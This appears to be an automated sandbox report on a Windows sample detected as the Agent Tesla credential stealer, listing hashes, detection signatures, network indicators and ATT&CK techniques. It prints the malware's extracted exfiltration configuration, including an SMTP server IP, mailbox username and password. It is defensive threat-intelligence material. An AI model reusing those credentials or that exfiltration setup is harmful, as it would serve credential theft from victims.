Windows
Analysis Report
VYLigyTDuW.exe
Overview
General Information
Sample name: | VYLigyTDuW.exerenamed because original name is a hash value |
Original sample name: | 56fdd77d4097b1ce3500d7178788e35731ffe0be159bca0bd1efe4e0477affa3.exe |
Analysis ID: | 1587591 |
MD5: | 89471f2ae47d710f5b6db4afe8a48e77 |
SHA1: | 903d8a21673dcc19826fa56731dc2710f2d95755 |
SHA256: | 56fdd77d4097b1ce3500d7178788e35731ffe0be159bca0bd1efe4e0477affa3 |
Tags: | exeuser-adrian__luca |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- VYLigyTDuW.exe (PID: 7300 cmdline:
"C:\Users\ user\Deskt op\VYLigyT DuW.exe" MD5: 89471F2AE47D710F5B6DB4AFE8A48E77) - RegAsm.exe (PID: 7360 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\reg asm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Agent Tesla, AgentTesla | A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel. |
{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxsenses@vetrys.shop", "Password": "M992uew1mw6Z"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
Click to see the 17 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen |
| |
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
Click to see the 25 entries |
Networking |
---|
Source: | Author: Joe Security: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T15:19:34.204660+0100 | 2030171 | 1 | A Network Trojan was detected | 192.168.2.4 | 49735 | 162.254.34.31 | 587 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T15:17:55.647888+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49735 | 162.254.34.31 | 587 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T15:17:55.647888+0100 | 2855245 | 1 | A Network Trojan was detected | 192.168.2.4 | 49735 | 162.254.34.31 | 587 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T15:19:34.204660+0100 | 2840032 | 1 | A Network Trojan was detected | 192.168.2.4 | 49735 | 162.254.34.31 | 587 | TCP |
Click to jump to signature section
AV Detection |
---|
Source: | Avira: |
Source: | Malware Configuration Extractor: |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | TCP traffic: |
Source: | IP Address: | ||
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | DNS query: | ||
Source: | DNS query: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: |
System Summary |
---|
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Code function: | 0_2_0054AA9F | |
Source: | Code function: | 0_2_022A2DA5 | |
Source: | Code function: | 0_2_022A2D84 | |
Source: | Code function: | 1_2_0044444F | |
Source: | Code function: | 1_2_0044148D | |
Source: | Code function: | 1_2_004414AB | |
Source: | Code function: | 1_2_0044395C | |
Source: | Code function: | 1_2_00441608 | |
Source: | Code function: | 1_2_0044436E | |
Source: | Code function: | 1_2_004443CE | |
Source: | Code function: | 1_2_0044189B | |
Source: | Code function: | 1_2_00441E22 |
Source: | Code function: | 1_2_010FC52C | |
Source: | Code function: | 1_2_010FDBE0 | |
Source: | Code function: | 1_2_010F4AA0 | |
Source: | Code function: | 1_2_010F3E88 | |
Source: | Code function: | 1_2_010F41D0 | |
Source: | Code function: | 1_2_010FE4BD | |
Source: | Code function: | 1_2_05975D50 | |
Source: | Code function: | 1_2_0597A150 | |
Source: | Code function: | 1_2_0597E0E8 | |
Source: | Code function: | 1_2_05979208 | |
Source: | Code function: | 1_2_059745C0 | |
Source: | Code function: | 1_2_05973560 | |
Source: | Code function: | 1_2_05973CC0 | |
Source: | Code function: | 1_2_05975670 | |
Source: | Code function: | 1_2_05970308 | |
Source: | Code function: | 1_2_0597C370 | |
Source: | Code function: | 1_2_067FA198 | |
Source: | Code function: | 1_2_067FBC48 | |
Source: | Code function: | 1_2_010FDF88 |
Source: | Static PE information: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Static PE information: |
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: |
Source: | Static PE information: |
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: | ||
Source: | ReversingLabs: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Static file information: |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Code function: | 0_2_00401249 | |
Source: | Code function: | 0_2_00409315 | |
Source: | Code function: | 0_2_0068F9E2 | |
Source: | Code function: | 0_2_0068FA42 | |
Source: | Code function: | 0_2_022A1611 | |
Source: | Code function: | 0_2_022A3C0F | |
Source: | Code function: | 0_2_022A055B | |
Source: | Code function: | 1_2_00440851 | |
Source: | Code function: | 1_2_010F0C52 | |
Source: | Code function: | 1_2_010F0C52 | |
Source: | Code function: | 1_2_010F0C7A | |
Source: | Code function: | 1_2_067FFAF4 |
Source: | Static PE information: |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | WMI Queries: |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | WMI Queries: |
Source: | WMI Queries: | ||
Source: | WMI Queries: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 0_2_0054B055 | |
Source: | Code function: | 0_2_0054ACFA | |
Source: | Code function: | 0_2_0054AD6C | |
Source: | Code function: | 0_2_0054AD80 | |
Source: | Code function: | 0_2_022A2DA5 | |
Source: | Code function: | 0_2_022A3376 | |
Source: | Code function: | 0_2_022A6F52 | |
Source: | Code function: | 0_2_022A707B | |
Source: | Code function: | 0_2_022A6C8B | |
Source: | Code function: | 0_2_022A6CEC | |
Source: | Code function: | 0_2_022A7109 | |
Source: | Code function: | 1_2_00443C55 | |
Source: | Code function: | 1_2_004438CD | |
Source: | Code function: | 1_2_00443CBD | |
Source: | Code function: | 1_2_00443D4B | |
Source: | Code function: | 1_2_00443921 | |
Source: | Code function: | 1_2_0044392E | |
Source: | Code function: | 1_2_004439A6 | |
Source: | Code function: | 1_2_004442FD | |
Source: | Code function: | 1_2_00443AB5 | |
Source: | Code function: | 1_2_00443B94 |
Source: | Process token adjusted: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Section loaded: | Jump to behavior |
Source: | Section unmapped: | Jump to behavior |
Source: | Memory written: | Jump to behavior |
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior | ||
Source: | Key opened: | Jump to behavior |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 121 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Shared Modules | Boot or Logon Initialization Scripts | 311 Process Injection | 2 Obfuscated Files or Information | 1 Credentials in Registry | 24 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Software Packing | Security Account Manager | 111 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 141 Virtualization/Sandbox Evasion | SSH | Keylogging | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 141 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 311 Process Injection | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
84% | Virustotal | Browse | ||
88% | ReversingLabs | Win32.Spyware.Negasteal | ||
100% | Avira | TR/AD.GenSteal.vwwcv |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
api.ipify.org | 172.67.74.152 | true | false | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
162.254.34.31 | unknown | United States | 64200 | VIVIDHOSTINGUS | true | |
172.67.74.152 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1587591 |
Start date and time: | 2025-01-10 15:16:57 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 7m 15s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 6 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | VYLigyTDuW.exerenamed because original name is a hash value |
Original Sample Name: | 56fdd77d4097b1ce3500d7178788e35731ffe0be159bca0bd1efe4e0477affa3.exe |
Detection: | MAL |
Classification: | mal100.spre.troj.spyw.evad.winEXE@3/1@1/2 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.60
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description |
---|---|---|
09:17:52 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
162.254.34.31 | Get hash | malicious | AgentTesla | Browse | ||
Get hash | malicious | AgentTesla | Browse | |||
Get hash | malicious | AgentTesla | Browse | |||
Get hash | malicious | AgentTesla | Browse | |||
Get hash | malicious | AgentTesla, XWorm | Browse | |||
Get hash | malicious | AgentTesla, XWorm | Browse | |||
Get hash | malicious | MassLogger RAT | Browse | |||
Get hash | malicious | MassLogger RAT | Browse | |||
Get hash | malicious | AgentTesla | Browse | |||
Get hash | malicious | AgentTesla | Browse | |||
172.67.74.152 | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Targeted Ransomware, TrojanRansom | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | RDPWrap Tool | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
api.ipify.org | Get hash | malicious | CredGrabber, Meduza Stealer | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | CredGrabber, Meduza Stealer | Browse |
| ||
Get hash | malicious | EvilProxy, HTMLPhisher | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla, PureLog Stealer | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | CStealer | Browse |
| ||
Get hash | malicious | CStealer | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
VIVIDHOSTINGUS | Get hash | malicious | AgentTesla | Browse |
| |
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | AgentTesla, XWorm | Browse |
| ||
Get hash | malicious | AgentTesla, XWorm | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
CLOUDFLARENETUS | Get hash | malicious | Snake Keylogger | Browse |
| |
Get hash | malicious | FormBook, PureLog Stealer | Browse |
| ||
Get hash | malicious | CobaltStrike, Metasploit | Browse |
| ||
Get hash | malicious | MassLogger RAT, PureLog Stealer | Browse |
| ||
Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | CAPTCHA Scam ClickFix | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
3b5074b1b5d032e5620f69f9f700ff0e | Get hash | malicious | PureLog Stealer, Quasar | Browse |
| |
Get hash | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
